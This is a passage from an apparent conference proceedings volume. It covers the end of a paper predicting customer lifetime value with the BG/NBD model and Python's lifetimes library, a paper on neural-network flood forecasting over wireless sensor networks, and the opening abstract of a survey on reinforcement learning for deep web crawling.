this system, the lifetimes library (in Python) is used as a tool to predict the customer
lifetime value.

2 Literature Review

D. Chen et al. [1] and F. Yoseph et al. [2] used the k-means clustering algorithm
and decision trees to help the business better understand its customers and
thereby conduct customer-centric marketing more effectively. The gap found is that
they did not address customer purchasing behavior. The work of P. P.
Pramono et al. [3] used hierarchical K-means with Ward's method to perform
cluster evaluation. This study approached two kinds of CLV segmentation
and showed that frequency was the main variable in the analysis. The gap is that,
since the segmentation is done based on certain factors, the organization can adjust
its marketing strategies only based on customer behavior. A. J. Christy et al. [4]
performed customer segmentation using recency, frequency, and monetary value (RFM)
analysis, which was then extended to other algorithms such as K-means clustering
and fuzzy C-means. The working of these approaches is analyzed and the execution
time of each algorithm is compared; the gap observed is that the proposed K-means
approach consumes more time and increases the number of iterations.
The study in [6] used two models, the BG/BB model and the BG/NBD model,
to predict the customer value per product. This study suggests that, instead of
using RFM to predict customer lifetime value, using RFM/P will give more
accuracy.
H. Jia et al. [7] used the Bayesian network model of IBM's SPSS Modeler
tool to investigate customer lifetime value related to risk factors in Internet
business. The gap is that the classification of customer risk is established only

on the assessment of enterprise business needs and past literature, which
may lead to the omission of risk factors. Multiple linear regression techniques [8] are
used as a conventional data analytic strategy for modeling CLV. In that study,
a framework has also been proposed explaining how social network information
can be incorporated into the data analytic models. Modeling the customer lifetime
value of airline customers is chosen as the example case, the proposed procedure
has been applied to it, and the findings have been evaluated.
Dahana et al. [9] used a latent class model to examine how lifestyle can explain the
heterogeneous customer lifetime values (CLVs) among different market segments.
In related studies, different kinds of clustering methods [10] are used to characterize
personality-based consumer perception of goods with country-of-origin labels by
analyzing large amounts of transaction data. A fuzzy clustering model [11, 12] is used
to cluster system group customers; in that study, a framework was proposed for
clustering system group customers based on relevant factors such as customer lifetime,
customer type, customer sum, strategic importance, and the number of software products.
ANOVA and regression models [13] are used to calculate customer equity (CE) and
to project the marketing return on investment (ROI) by using risk simulation in the
context of the tourism and hospitality industry. Mathematical models [14] are
implemented to find a sound fit between customer loyalty programs and the prevailing
notion of loyalty among customers. The objective of E. Lee et al. [15] is to propose a
churn prediction method for improving profit. They proposed a churn prediction model
involving two main steps: (1) choosing the prediction target and (2) tuning the decision
threshold of the model. The model was validated by applying the proposed techniques
to a live online game that has been in operation for over nine years to check its
effectiveness. Gradient boosted trees are used in [16] to present a mathematical model
framework for the determination of customer lifetime value. That study conducted an
experimental analysis of customer CLV based on real data sets, applying a gradient
boosting algorithm rather than fitting a single base learner directly.
The research in [17] makes two considerable theoretical and methodological
contributions. First, the study results both add to our understanding
of hospitality customer–firm relationships and provide a foundation for future
hospitality marketing and customer relationship research. While the idea of customer
relationships has long existed, it has not been studied as a multidimensional
construct; hospitality researchers have generally focused on measuring specific
components of customer relationships, e.g., customer commitment or loyalty.
Second, the proposed customer relationship scale provides a relationship marketing
framework for research focused on better understanding both the effects of different
marketing activities and the financial return on investment from marketing activities
and ventures. The aim of the work in [18], since customer lifetime value is highly
significant, was to build a framework to quantify this value across brands and regions. A

scientific research approach was adopted. This study produces evidence, for
example, that “lifetime economic worth (EVC) differs by group and the effect
of its drivers also varies.” In the research of [19], binomial logistic regression is
used to predict customer lifetime value through a data mining technique in a direct
selling company.

3 Proposed Framework

Prediction of customer lifetime value is a regression problem. The dataset contains labeled
data, and the proposed work aims to predict customer lifetime value based on labeled
customer transaction data. Therefore, supervised algorithms are used to train on the
dataset and predict the outcome. The model considered for this work is the beta
geometric/negative binomial distribution (BG/NBD) model, which belongs to the
“Buy 'Til You Die” (BTYD) family of models popularized by Peter Fader. The
mathematics behind these models is fairly involved, but fortunately it has been
encapsulated in the lifetimes library. This model is chosen because it predicts the
customer lifetime value based on the customer's transaction history (Fig. 1).
The first step in the model is to build the RFM table, a new dataset that contains
the recency, frequency, and monetary value. Frequency represents the number of
repeat purchases; recency represents the age of the customer at the time of their most
recent purchase; monetary value represents the average value (or average cost) of a given
customer's purchases. The second step is to pass the data into the model, which is trained
on the data to predict the customer lifetime value. In the third step, the model fit is
assessed using calibration and holdout data.
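A minimal sketch of this three-step workflow using the Python lifetimes library is shown below. The transaction file and its column names are assumptions for illustration, and the Gamma-Gamma submodel used to convert purchase forecasts into a monetary CLV figure is a common companion to BG/NBD in the lifetimes library rather than a step spelled out in this paper; model fit can likewise be assessed with the library's calibration_and_holdout_data utility.

import pandas as pd
from lifetimes import BetaGeoFitter, GammaGammaFitter
from lifetimes.utils import summary_data_from_transaction_data

# Assumed transaction log with columns: customer_id, date, amount.
transactions = pd.read_csv("transactions.csv", parse_dates=["date"])

# Step 1: build the RFM summary (frequency, recency, T, monetary_value).
rfm = summary_data_from_transaction_data(
    transactions, "customer_id", "date", monetary_value_col="amount"
)

# Step 2: fit the BG/NBD model on the repeat-purchase behaviour.
bgf = BetaGeoFitter(penalizer_coef=0.001)
bgf.fit(rfm["frequency"], rfm["recency"], rfm["T"])

# Forecast expected purchases and probability of being "alive" over the next 30 days.
rfm["pred_purchases_30d"] = bgf.conditional_expected_number_of_purchases_up_to_time(
    30, rfm["frequency"], rfm["recency"], rfm["T"]
)
rfm["p_alive"] = bgf.conditional_probability_alive(
    rfm["frequency"], rfm["recency"], rfm["T"]
)

# Step 3: add a Gamma-Gamma model of spend to turn the forecast into a CLV figure.
returning = rfm[(rfm["frequency"] > 0) & (rfm["monetary_value"] > 0)]
ggf = GammaGammaFitter(penalizer_coef=0.001)
ggf.fit(returning["frequency"], returning["monetary_value"])
rfm.loc[returning.index, "clv"] = ggf.customer_lifetime_value(
    bgf,
    returning["frequency"], returning["recency"], returning["T"],
    returning["monetary_value"],
    time=1,              # forecast horizon in months (assumed)
    discount_rate=0.01,  # assumed monthly discount rate
)
print(rfm.sort_values("clv", ascending=False).head())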

4 Results

After executing our models, we can predict the lifetime value of each customer,
and the figures below show the results obtained after executing the model.
From these figures, we can see the forecast of each customer's lifetime value
for the next 30 days, as well as the probability of a customer being alive
in the upcoming 30 days (Fig. 2).
From Fig. 3 it is clearly visible that the predicted values are close to the actual
values.

4.1 Mean Absolute Error

Fig. 1 Architecture of the model

Absolute error is the measure of error in an estimate, as shown in Eq. (1). It is
the difference between the predicted (or estimated) value and the actual (or true)
value.

$\mathrm{MAE} = \frac{1}{n} \sum_{i=1}^{n} |y_i - x_i|$   (1)

Here, y_i is the prediction, x_i is the true value, and n is the total number of points. The mean
absolute error obtained is 1.23%.
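As a quick check of Eq. (1), the snippet below computes the MAE for a few placeholder predictions; the numbers are illustrative only and are not the paper's data.

import numpy as np

y_pred = np.array([102.0, 56.5, 10.2])   # predicted CLV values (placeholder)
x_true = np.array([100.0, 57.0, 11.0])   # actual values (placeholder)

mae = np.mean(np.abs(y_pred - x_true))   # Eq. (1)
print(f"MAE = {mae:.3f}")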

Fig. 2 Forecasting next 30 days

Fig. 3 Line chart of actual versus predicted values

5 Conclusion

The lifetime value of a customer, or customer lifetime value (CLV), represents
the total amount of money a customer is expected to spend in the business, or
on company products, during their lifetime. This is an important figure to
understand because it helps the company make decisions about how much money
to invest in acquiring new customers and retaining existing ones. Analyzing the
customer lifetime value is therefore essential for organizations to learn which
customers are loyal to them. In this project, the beta geometric/negative binomial
distribution (BG/NBD) model was chosen because it predicts future purchasing based
on customers' observed purchase history. The model

evaluation is done to see how well the model predicts when compared to the actual
values. In this work, it has been demonstrated through the literature review
and introduction how customer lifetime value can be helpful to companies;
for that, the system is developed using RFM, and the error score reflects the
performance of the model.

References

1. Chen, D., Sain, S. L., & Guo, K. (2012). Data mining for the online retail industry: A case study
of RFM model-based customer segmentation using data mining. Journal Database Marketing
Customer Strategic Management, 19(3), 197–208. https://doi.org/10.1057/dbm.2012.17
2. Yoseph, F., & Heikkila M. (2019). Segmenting retail customers with an enhanced RFM and
a hybrid regression/clustering method. In Processing of International Conference of Machine
Learning Data Engineering. iCMLDE 2018 (Vol. Clv, pp. 77–82). https://doi.org/10.1109/iCM
LDE.2018.00029.
3. Pramono, P. P., Surjandari, I., & Laoh, E. (2019). Estimating customer segmentation based
on customer lifetime value using two-stage clustering method. In 2019 16th International
Conference Services System Services Management ICSSSM 2019. (Vol. 1994, pp. 1–5). https://
doi.org/10.1109/ICSSSM.2019.8887704.
4. Christy, A. J., Umamakeswari, A., Priyatharsini, L., Neyaa, A. (2018). RFM ranking—An
effective approach to customer segmentation. Journal of King Saud Universal—Computer
Information Science. https://doi.org/10.1016/j.jksuci.2018.09.004.
5. Heldt, R., Silveira, C. S., & Luce, F. B. (2019). Predicting customer value per product: From
RFM to RFM/P. Journal Business Resources. https://doi.org/10.1016/j.jbusres.2019.05.001.
6. He, X., & Li, C. (2017). The research and application of customer segmentation on e-commerce
websites. In Proceedings—2016 International Conference Digital Home, ICDH 2016 (pp. 203–
208). https://doi.org/10.1109/ICDH.2016.050.
7. Jia, H. & Li, C. (2019) The research of customer lifetime value related to risk factors in
the internet business. In Proceedings—18th IEEE/ACIS International Conference Computer
Information Science ICIS 2019 (Vol. 1, pp. 105–110). https://doi.org/10.1109/ICIS46139.2019.
8940315.
8. Çavdar, A. B., & Ferhatosmanoğlu, N. (2018). Airline customer lifetime value estimation using
data analytics supported by social network information. Journal of Air Transport Management,
67, 19–33. https://doi.org/10.1016/j.jairtraman.2017.10.007
9. Dahana, W. D., Miwa, Y., & Morisada, M. (2019). Linking lifestyle to customer lifetime value:
An exploratory study in an online fashion retail market. Journal of Business Resource, 99,
319–331. https://doi.org/10.1016/j.jbusres.2019.02.049
10. Chiang, L. L., & Yang, C. S. (2018). Does country-of-origin brand personality generate retail
customer lifetime value? A big data analytics approach. Technology Forecasting Social Change,
130, 177–187. https://doi.org/10.1016/j.techfore.2017.06.034
11. Hasanpour, Y., Nemati, S., & Tavoli, R. (2018). Clustering system group customers through
fuzzy C-Means clustering. In Proceedings—2018 4th Iranian Conference Signal Processing
Intelligence System ICSPIS 2018. (pp. 161–165). https://doi.org/10.1109/ICSPIS.2018.870
0548.
12. Monalisa, S., Nadya, P., & Novita, R. (2019). Analysis for customer lifetime value categoriza-
tion with RFM model. Procedia Computer Science, 161, 834–840. https://doi.org/10.1016/j.
procs.2019.11.190
13. Kim, Y. P., Boo, S., & Qu, H. (2018). Calculating tourists’ customer equity and maximizing the
hotel’s ROI. Tourism Management, 69(March), 408–421. https://doi.org/10.1016/j.tourman.
2018.05.001

14. Srivastava, M., & Rai, A. K. (2018). Mechanics of engendering customer loyalty: A conceptual
framework. IIMB Management Review, 30(3), 207–218. https://doi.org/10.1016/j.iimb.2018.
05.002
15. Lee, E., Kim, B., Kang, S., Kang, B., Jang, Y., & Kim, H. K. (2018). Profit optimizing churn
prediction for long-term loyal customers in online games. IEEE Transaction Games, 12(1),
41–53. https://doi.org/10.1109/tg.2018.2871215
16. Singh, L., Kaur, N., & Chetty, G. (2018) Customer life time value model framework using
gradient boost trees with RANSAC response regularization. In Proceeding International Jt.
Conference Neural Networks (Vol. 2018-July, pp. 1–8). https://doi.org/10.1109/IJCNN.2018.
8489710.
17. Hyun, S. S., & Perdue, R. R. (2017). Understanding the dimensions of customer relationships
in the hotel and restaurant industries. International Journal of Hospitality Management, 64,
73–84. https://doi.org/10.1016/j.ijhm.2017.03.002
18. Baidya, M. K., Maity, B., Ghose, K. (2019). Innovation in marketing strategy: A customer
lifetime value approach 25, 25–41. https://doi.org/10.6347/JBM.201909.
19. Mauricio, A. P., Payawal, J. M. M., Dela Cueva, M. A., & Quevedo, V. C. (2016) Predicting
customer lifetime value through data mining technique in a direct selling company. In 2016
International Conference Industrial Engineering Management Science Application (pp. 1–5).
https://doi.org/10.1109/ICIMSA.2016.7504027.
An Intelligent Flood Forecasting System
Using Artificial Neural Network in WSN

K. S. Raghu Kumar and Rajashree V. Biradar

Abstract The flood forecasting system is widely used in the hydrological research,
and neural network has provided considerable assistance in the prediction of the
flood. The flood alert system helps by mitigating damage and enhancing public safety.
The proposed model is an intelligent flood alerting system using the neural network
for a wireless sensor network (WSN). The neural network model is composed of past
rainfall measurements with rainfall in diverse duration and flow of water. Various
environmental factors are considered, while training the proposed model and the
significant insights are framed. This paper incorporates the fuzzy and sigmoid func-
tion for the identification of the rainfall–runoff process. The proposed model is investigated
by comparing the parameters end to end delay, packet loss, and throughput. From
the observation and comparison of results, the proposed model has the best outcome.
The simulation analysis is compared with the existing approach and obtained an
effective prediction.

Keywords Neural network · Flood forecasting · Water level · Packet loss · And
throughput

1 Introduction

The main intent of flood prediction is minimizing the impact of economic factors and
the risk of human lives [1–3]. An effective flood alert system assists the collection
of data, analysis of collected data, monitoring the scenario of rainfall, and warning
the people about the flood with the increased water level. Wireless sensor nodes
and wireless sensor networks play a prominent role in the entire process of flood
prediction [4]. The nodes in the sites will gather the data about the atmospheric

K. S. R. Kumar
Department of CSE, RYM EC, Ballari, Karnataka, India
R. V. Biradar (B)
Department of CSE, BITM, Ballari, Karnataka, India


condition, whereas a microcontroller is instilled to analyze the gathered data about


the site and thereby gives the flood alert to the people [5, 6].
Humanity across the world is blessed with nature, and this scenario will alter the
situation by making natural calamities [7]. The disaster across the world causes a
great impact on the life of humans and sustainable progress toward the enhanced
future [8–11]. Technological and research development has made the researchers
develop prediction and alerting approaches for such calamities [12, 13]. Among these,
the devastation caused by floods is immense, making human life more complicated,
and an effective system is needed. The development of wireless and computer-based
approaches has been initiated by researchers to predict floods. Such a system will monitor
the rainfall and water level which forecast the flood [14].
The sensor nodes are placed at diverse locations, which collects information about
the environmental factors related to rainfall. The collected information is stored in
the database servers to predict the pattern of rainfall. The generated patterns are
used for the analysis and the prediction of the occurrence of a flood. The data is
analyzed by various researchers with diverse algorithms. The existing algorithm for
flood prediction has numerous ineffectiveness in the prediction process. The flood
forecasting system is highly sensitive, and ineffectiveness may lead to high disaster in
the life of humans. To overcome the drawbacks in the existing approach, an enriched
algorithm is introduced in this paper, which is discussed in the subsequent section.
The real-time flood monitoring, as well as water-level prediction systems, is
developed, and they are ineffective in the prediction. The utilization of data-driven
approaches is familiar in recent days, and they are highly used to minimize the dura-
tion of computation and permit real-time intelligent flood forecasting. An artificial
neural network (ANN)-based approach is developed to predict the flood from the
rainfall data. The proposed approach attained the best result when compared with
the existing scheme. The process of predicting the flood is one of the significant and
essential approaches, whereas the ANN-based model has a diverse advantage over
the existing approach in terms of performance and prediction.
The remaining of the paper is organized as follows, available flood prediction
approaches, and their drawbacks are explained in Sect. 2, the intelligent flood fore-
casting system with a neural network is described in Sect. 3, experimental results
are illustrated in Sect. 4, and the proposed forecasting framework is concluded with
a suggestion for future work in Sect. 5.

2 Related Work

The disaster caused in Southeast Asia results in great loss of economic damage and
the life of living beings. The international agencies and government have formu-
lated the disaster response methods are developed with the remote sensing data that
monitors the environment temporarily and spatially [15]. The normalized difference
vegetation index is applied to train the water classifier used for the time period of
interest. An operational flood identification component is generated that performs

the composition of the image. The radar-based observation of historic rainfall event
and assessment accuracy is presented. The decision support approach has provided
a supportive tool and needed information to the developing organization.
The operational risk in the flood is managed by the global flood partnership, and
the result is used to monitor and predict the flood event [16]. The developed approach
reduced the impact of the disaster and maintained emergency operations effectively.
The flood prediction model developed using a wireless sensor network [17] predict
the occurrence of flood in the river that is fast and simple. The proposed approach
has saved the people by predicting the flood effectively.
The linear regression approach is incorporated with WSN and uses multiple vari-
ables. The approach is reliable and independent of parameters where the approach is
desirable for any real-time scenario. The approach is effective for several situations
and has some limitations in its performance, namely ineffectiveness and inaccuracy. In
certain countries, rainfall and typhoons are more common, and intensified and
prolonged rainfall causes floods [18].
A predictive model is developed to predict the status of rainfall and flood. From
the rain gauge, rainfall data is collected using the sensors and microcontrollers. The
data is further used in the analyses, and it gives the advisories as well as a warning to
the relevant person. Environmental factors like rainfall amount, temperature, water
level, and humidity. The information from the sensor nodes helps in the prediction
of flood and water levels [19].
Flood is a recurrent disaster across the world that happens due to excess flow of
water, specifically in low-lying areas. The quality of water affects the lifespan
of living beings on the earth. The proposed system [20] describes the deployment and
design of a real-time water quality and flood monitoring system with fast and simple
estimation that provides effective control measures.
The main approach of the steamflood and waterflood tracking system (SWATS)
[21] is permitting the incessant observing system for the steamflood and water-
flood systems with granularity attention, short delay, and low cost while giving high
reliability and effective accuracy. Identification and anomaly recognition is a
challenging task because of the intrinsic unreliability and inaccuracy of sensors
and the transient characteristics of the water flows. The inefficiency and
inaccuracy of the existing approaches are rectified using the artificial neural network,
which is discussed in Sect. 3.

3 Flood Forecasting Framework

The proposed flood forecasting system is designed by a general hydrological


approach, and the approach uses the past measurement of rainfall. The available
approaches are ineffective in prediction, and hence, the system is developed with a
neural network, which enhances the prediction and performance of the flood fore-
casting system. The flood forecasting system with the proposed neural network

Fig. 1 Flood forecasting system with neural network

approach is illustrated in Fig. 1, which displays the overall training and testing of the
rainfall data using a neural network for forecasting the rainfall.
The rainfall–runoff process is modeled via a neural network with the water level
a(t + l) as the target value, and the network has one hidden layer. Past water-level
measurements are taken as input together with the n available rain gauges rf_1, rf_2, ...,
rf_n, whose time lags are denoted tl_1, tl_2, ..., tl_n. The time taken by the rainwater to
reach the river is accounted for through these time lags, and every input gauge is
assigned the same order q. The exogenous rainfall measurements are therefore
rf_1(t − tl_1), rf_1(t − tl_1 − 1), ..., rf_1(t − tl_1 − q + 1), ..., rf_n(t − tl_n), ..., rf_n(t − tl_n − q + 1),
so the overall network input consists of (a + n·q) variables. The vector v is composed
of all the input variables.
Within the developed network, the hidden layer computes a weighted sum of the inputs
at the kth node, as follows:


$X_k = \sum_{j=0}^{a+nq} w_{jk}\, v_j - b_k$   (1)

where the weight w_jk is assigned to input v_j at the kth node and the neuron bias is
b_k. The signal X_k is then passed as the argument of the activation function at the neuron.

Table 1 Assignment of threshold values
Data collection High Medium Low
Humidity >40% 20–40% <20%
Water level >72% 30–72% <30%
Vibration >150 mH 50–150 mH <50 mH
Temperature >34 °C 15–34 °C <15 °C

The sigmoid function is used as the activation function:

$C_k = f(X_k) = 1 - \dfrac{2}{\exp(2 X_k) + 1}$   (2)

The outputs C_k of the hidden layer neurons are then transmitted to the output
layer, which consists of a single linear node that weights the values C_k by
W_k. This returns the value of the forecast

$a(t + l) = \sum_{k} W_k C_k - b_{ot}$   (3)

where b_ot denotes the bias associated with the output neuron, and the network is
organized as a direct forecaster. It returns the l-steps-ahead prediction directly,
avoiding the intermediate forecasts required by a recursive scheme, which may
propagate errors. Under mild assumptions, a direct forecaster can be shown to give
better performance than the recursive approach. The threshold value assignment and
the forecasting rules are given in Tables 1 and 2.
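A minimal NumPy sketch of the forward pass defined by Eqs. (1)-(3) is given below; the layer sizes and random weights are placeholders for illustration, with 12 hidden neurons chosen to match the simulation setup described later.

import numpy as np

rng = np.random.default_rng(0)

n_inputs, n_hidden = 10, 12                        # e.g. (a + n*q) inputs, 12 hidden neurons
W_hidden = rng.normal(size=(n_hidden, n_inputs))   # weights w_jk
b_hidden = rng.normal(size=n_hidden)               # biases b_k
W_out = rng.normal(size=n_hidden)                  # output weights W_k
b_out = rng.normal()                               # output bias b_ot

def activation(x):
    """Eq. (2): f(x) = 1 - 2/(exp(2x) + 1), which is algebraically equal to tanh(x)."""
    return 1.0 - 2.0 / (np.exp(2.0 * x) + 1.0)

def forecast(v):
    """Direct l-steps-ahead forecast a(t + l) for an input vector v."""
    x_k = W_hidden @ v - b_hidden   # Eq. (1): weighted sums at the hidden nodes
    c_k = activation(x_k)           # Eq. (2): hidden-layer outputs
    return W_out @ c_k - b_out      # Eq. (3): linear output node

v = rng.normal(size=n_inputs)       # placeholder for past water levels and lagged rainfall
print(forecast(v))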
The data is collected from diverse sensor nodes and processed with the help of
the WSN approach. The model is trained on the dataset using the neural network, and
the activation function is applied to acquire the decision from the testing data. The
overall flow of the algorithm is illustrated in Fig. 2.

Table 2 Forecasting framework for disaster identification


Sensor level Vibration Temperature Humidity Months Output
Low Low Normal Low January and February No
Normal Low High Low March and April No
High Normal Normal Normal May and June Yes
High High Normal High July and August No
High High Low High September and October Yes
Normal Normal Low High November and December Yes
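The sketch below shows one way the threshold bands of Table 1 and a few rows of the rule table (Table 2) could be applied in code; the mapping of Table 1's "Medium" band to Table 2's "Normal" level is an assumption made for illustration, and only a subset of Table 2's rows is encoded.

def humidity_band(h_pct: float) -> str:
    # Table 1: High > 40%, 20-40% middle band ("Medium", treated as "Normal"), Low < 20%
    if h_pct > 40:
        return "High"
    return "Normal" if h_pct >= 20 else "Low"

def water_level_band(w_pct: float) -> str:
    # Table 1: High > 72%, 30-72% middle band, Low < 30%
    if w_pct > 72:
        return "High"
    return "Normal" if w_pct >= 30 else "Low"

# A few rows of Table 2, keyed by (water/sensor level, vibration, temperature, humidity):
FLOOD_RULES = {
    ("High", "Normal", "Normal", "Normal"): True,   # May and June row -> Yes
    ("High", "High", "Low", "High"): True,          # September and October row -> Yes
    ("Low", "Low", "Normal", "Low"): False,         # January and February row -> No
}

def flood_alert(level: str, vibration: str, temperature: str, humidity: str) -> bool:
    """Look up the Table 2 rule for the observed bands; default to no alert."""
    return FLOOD_RULES.get((level, vibration, temperature, humidity), False)

print(flood_alert(water_level_band(80.0), "Normal", "Normal", humidity_band(35.0)))  # True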

Fig. 2 Overall training and testing of the rainfall data using ANN

4 Result and Discussion

Our proposed flood forecasting system is simulated using the network simulator NS2,
and the experiment is implemented with the help of MATLAB. Network parameters,
namely delay, packet loss, and throughput, are compared, while the packet size is kept
constant and packets are transmitted at an interval of 1 s. The hidden layer of
the network is kept static with 12 neurons in one layer. The resultant values of the
simulation are given in Tables 3, 4, and 5.
Throughput is the actual quantity of data sent or received successfully over the
communication link. Throughput is measured in bps, and it is distinct from the band-
width; it is the total amount of information that can be processed in a given amount
of time. The topology with higher throughput is the best topology with effective
performance. From Table 3, the proposed topology has the highest throughput, and
it is illustrated in Fig. 3.
Packet loss is the rate of data loss during the data transmission across the commu-
nication channel, and it is caused by an error in the network, congestion in the
network, data flooding, and breakage of links in the network. The topology with a
minimum percentage of packet loss is considered as the best topology, and the simu-
lation analysis is given in Table 4. From the results, it is identified that the proposed
model has the best result, and it is illustrated in Fig. 4 (Fig. 5).

Table 3 Comparison of throughput (bps) and number of nodes
Number of nodes Star Mesh Proposed model
125 150 155 160
175 140 145 155
220 130 135 150
275 135 140 145
325 120 130 140
375 115 125 135
425 100 110 125

Table 4 Comparison of packet loss (%) and pause time
Pause time (s) Star Mesh Proposed model
50 20 18 15
100 34 31 29
150 42 39 37
200 56 51 49
250 58 53 51
300 60 59 58
350 63 60 59

Table 5 Comparison of end-to-end delay (s) and number of nodes
Number of nodes Star Mesh Proposed model
125 12 11 10
175 15 14 12
220 18 16 14
275 21 18 15
325 23 22 19
375 25 24 21
425 26 25 20

Fig. 3 Comparison of the number of nodes versus throughput (x-axis: number of nodes; y-axis: throughput in bps; series: Star, Mesh, Proposed model)

Fig. 4 Comparison of packet loss versus pause time (x-axis: pause time in s; y-axis: packet loss in %; series: Star, Mesh, Proposed model)



Fig. 5 Comparison of end-to-end delay versus number of nodes (x-axis: number of nodes; y-axis: end-to-end delay in s; series: Star, Mesh, Proposed model)

Table 6 Training and checking error for different epochs
Number of epochs Training error Checking error
50 0.25 0.57
100 0.21 0.59
150 0.18 0.60
200 0.16 0.61

From the observation of results and comparison with various parameters, the
proposed approach attained the best result. The flood detection process is highly
effective with the proposed ANN model.
The proposed model is trained with a backpropagation approach, and it uses the
sigmoid activation function with a learning rate of 0.8 and an error threshold of 10^-3.
The root mean square error (RMSE) of the training and checking errors for different
numbers of epochs is given in Table 6.
The root mean square error (RMSE) of the training and checking errors for different
numbers of epochs is plotted in Figs. 6 and 7. The training and checking errors in
the proposed approach are low, and hence, the accuracy is improved.
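For completeness, the training and checking errors reported in Table 6 and Figs. 6-7 would be computed as a root mean square error of the form sketched below; the arrays are placeholder values, not the paper's data.

import numpy as np

def rmse(predicted, actual):
    """Root mean square error between predicted and actual values."""
    predicted, actual = np.asarray(predicted), np.asarray(actual)
    return float(np.sqrt(np.mean((predicted - actual) ** 2)))

print(rmse([0.8, 0.2, 0.6], [1.0, 0.0, 0.5]))   # placeholder example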

5 Conclusion

An intelligent flood alerting system is developed using a neural network over a
wireless sensor network (WSN). The sensor nodes scattered across the network
utilize a very low-power network and collect data such as rainfall, rate of rainfall
for every month, humidity, and wind speed in the atmosphere. Various environmental
factors are considered while training the proposed model, and significant insights are
framed. The proposed model is tested by considering parameters such as end-to-end
delay, packet loss, and throughput.

Fig. 6 Training error versus number of epochs

Fig. 7 Checking error versus number of epochs

From the observation of results, the proposed model has the best outcome. The flood
alert system is framed with the assistance of threshold assignment, and the prediction
results are effective, with promising simulation analysis. The simulation parameters
of the proposed scheme are investigated by comparing it with the existing star and
mesh topologies, and the proposed approach attained the best outcome. In the future,
the proposed approach can be used to predict floods in various locations.

References

1. Ragnoli, M., Barile, G., Leoni, A., Ferri, G., & Stornelli, V. (2020). An autonomous low-power
LoRa-based flood-monitoring system. Journal of Low Power Electronics and Applications,
10(2), 15.

2. Shamsi, S. (2019). Flood forecasting review using wireless sensor network. Global Sci-Tech,
11(1), 13–22.
3. Patil, P. S., & Jain, S. S. Survey on flood monitoring & alerting systems.
4. Dwivedi, R. K., Kumari, N., & Kumar, R. (2020). Integration of wireless sensor networks with
cloud towards efficient management in IoT: A review. In Advances in data and information
sciences (pp. 97–107). Springer.
5. Ullah, T. F., Gnana Prakasi O. S., & Kanmani, P. (2020). A review on flood prediction algorithms
and a deep neural network model for estimation of flood occurrence. International Research
Journal of Multidisciplinary Technovation, 2(5), 8–14.
6. Sakib, S. N., Ane, T., Matin, N., & Kaiser, M. S. (2016). An intelligent flood monitoring
system for Bangladesh using wireless sensor network. In 2016 5th International Conference
on Informatics, Electronics and Vision (ICIEV) (pp. 979–984). IEEE.
7. Aziz, N. A. A., & Aziz, K. A. (2011, February). Managing disaster with wireless
sensor networks. In 13th International Conference on Advanced Communication Technology
(ICACT2011) (pp. 202–207). IEEE.
8. Pant, D., Verma, S., & Dhuliya, P. (2017, September). A study on disaster detection and manage-
ment using WSN in Himalayan region of Uttarakhand. In 2017 3rd International Conference
on Advances in Computing, Communication and Automation (ICACCA)(Fall) (pp. 1–6). IEEE.
9. Singh, V. P., Jain, S., & Singhai, J. (2010). Hello flood attack and its countermeasures in wireless
sensor networks. International Journal of Computer Science Issues (IJCSI), 7(3), 23.
10. Lee, J. U., Kim, J. E., Kim, D., Chong, P. K., Kim, J., & Jang, P. (2008, September). RFMS: Real-
time flood monitoring system with wireless sensor networks. In 2008 5th IEEE International
Conference on Mobile Ad Hoc and Sensor Systems (pp. 527–528). IEEE.
11. Hughes, D., Greenwood, P., Blair, G., Coulson, G., Grace, P., Pappenberger, F., … Beven,
K. (2008). An experiment with reflective middleware to support grid-based flood monitoring.
Concurrency and Computation: Practice and Experience, 20(11), 1303–1316.
12. Roy, J. K., Gupta, D., & Goswami, S. (2012, December). An improved flood warning system
using WSN and Artificial Neural Network. In 2012 Annual IEEE India Conference (INDICON)
(pp. 770–774). IEEE.
13. Castillo-Effer, M., Quintela, D. H., Moreno, W., Jordan, R., & Westhoff, W. (2004, November).
Wireless sensor networks for flash-flood alerting. In Proceedings of the Fifth IEEE International
Caracas Conference on Devices, Circuits and Systems, 2004 (Vol. 1, pp. 142–146). IEEE.
14. Merkuryeva, G., Merkuryev, Y., Sokolov, B. V., Potryasaev, S., Zelentsov, V. A., & Lektauers, A.
(2015). Advanced river flood monitoring, modelling and forecasting. Journal of Computational
Science, 10, 77–85.
15. Ahamed, A., & Bolten, J. D. (2017). A MODIS-based automated flood monitoring system for
southeast Asia. International Journal of Applied Earth Observation and Geoinformation, 61,
104–117.
16. Alfieri, L., Cohen, S., Galantowicz, J., Schumann, G. J., Trigg, M. A., Zsoter, E., …, Rudari,
R. (2018). A global network for operational flood risk reduction. Environmental Science and
policy, 84, 149–158.
17. Seal, V., Raha, A., Maity, S., Mitra, S. K., Mukherjee, A., & Naskar, M. K. (2012). A simple
flood forecasting scheme using wireless sensor networks. arXiv preprint arXiv:1203.2511.
18. Panganiban, E. B., & Cruz, J. C. D. (2017, November). Rain water level information with
flood warning system using flat clustering predictive technique. In TENCON 2017–2017 IEEE
Region 10 Conference (pp. 727–732). IEEE.
19. Udo, E. N., & Isong, E. B. (2013). Flood monitoring and detection system using wireless sensor
network. Asian Journal of Computer and Information Systems, 1(04).
20. Jegadeesan, S., Dhamodaran, M., & Sri Shanmugapriya, S. (2018). Wireless sensor network
based flood and water quality monitoring system using IoT. Taga Journal of Graphic
Technology, Online ISSN (1748-0345).
21. Yoon, S., Ye, W., Heidemann, J., Littlefield, B., & Shahabi, C. (2011). SWATS: Wireless sensor
networks for steamflood and waterflood pipeline monitoring. IEEE Network, 25(1), 50–56.
Reinforcement Learning in Deep Web
Crawling: Survey

Kapil Madan and Rajesh Bhatia

Abstract Context: Reinforcement learning (RL) can help in solving various chal-
lenges of deep web crawling. Deep web content can be accessed by filling the search
forms rather than hyperlinks. Understanding the search form and proper selection
of queries are necessary steps to retrieve the deep web content successfully. Thus,
crawling the deep web is a very challenging task. The reinforcement learning-based
technique helps in filling the search form and retrieving the deep web content success-
fully. RL selects the action based on the given state, and the environment assigns
reward/penalty to the selected action. Objective: This study reports a survey of RL-
based techniques applied in the domain of deep web crawling. Method: Existing liter-
ature survey is based on 31 articles from 77 articles published in various reputed jour-
nals, conferences, and workshops. Results: Challenges related to various crawling
steps of deep web crawling are presented. RL-based techniques are being used in
multiple research papers, which solves deep web crawling challenges. Comparative
analysis of RL techniques used in deep web crawling is done based on the strength,
metrics, dataset, and research gaps. Conclusion: Various RL-based techniques can
be applied to deep web crawling, which has not been explored yet. Open challenges
and research directions are also recommended.

Keywords Reinforcement learning · Deep web · Ranked deep web · Query · Form
discovery · Query selection · Information Retrieval

K. Madan (B) · R. Bhatia
